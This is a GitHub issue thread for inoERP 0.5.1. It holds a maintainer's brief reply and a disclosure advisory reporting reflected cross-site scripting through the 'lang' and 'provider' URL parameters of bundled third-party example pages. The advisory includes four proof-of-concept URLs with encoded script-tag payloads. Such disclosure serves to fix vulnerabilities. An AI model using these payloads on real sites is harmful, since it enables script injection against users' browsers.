inoerp
commented
7 years ago Hi bestshow,
All the products you have mentioned locale/hybridauth are third party applications and not developed by inoERP. You don't need to use any third party application to use inoERP. You can just remove them from your application
Product: inoerp Download: https://github.com/inoerp/inoERP Vunlerable Version: 0.5.1 and probably prior Tested Version: 0.5.1 Author: ADLab of Venustech
Advisory Details: Multiple Cross-Site Scripting (XSS) were discovered in“inoerp 0.5.1”, which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user-supplied data in the multiple HTTP GET parameters passed to several URL. An attacker could execute arbitrary HTML and script code in a browser in context of the vulnerable website. The exploitation examples below use the "alert()" JavaScript function to see a pop-up messagebox: Poc: (1) http://localhost/.../inoERP-master/inoerp/locale/examples/pigs_dropin.php?lang=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22 (2) http://localhost/.../inoERP-master/inoerp/locale/examples/pigs_fallback.php?lang=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22 (3) http://localhost/.../inoERP-master/inoerp/tparty/extensions/social_login/hybridauth/examples/social_hub/includes/menu.php?provider=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22 (4) http://localhost/.../inoERP-master/inoerp/tparty/extensions/social_login/hybridauth_old/examples/social_hub/includes/menu.php?provider=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22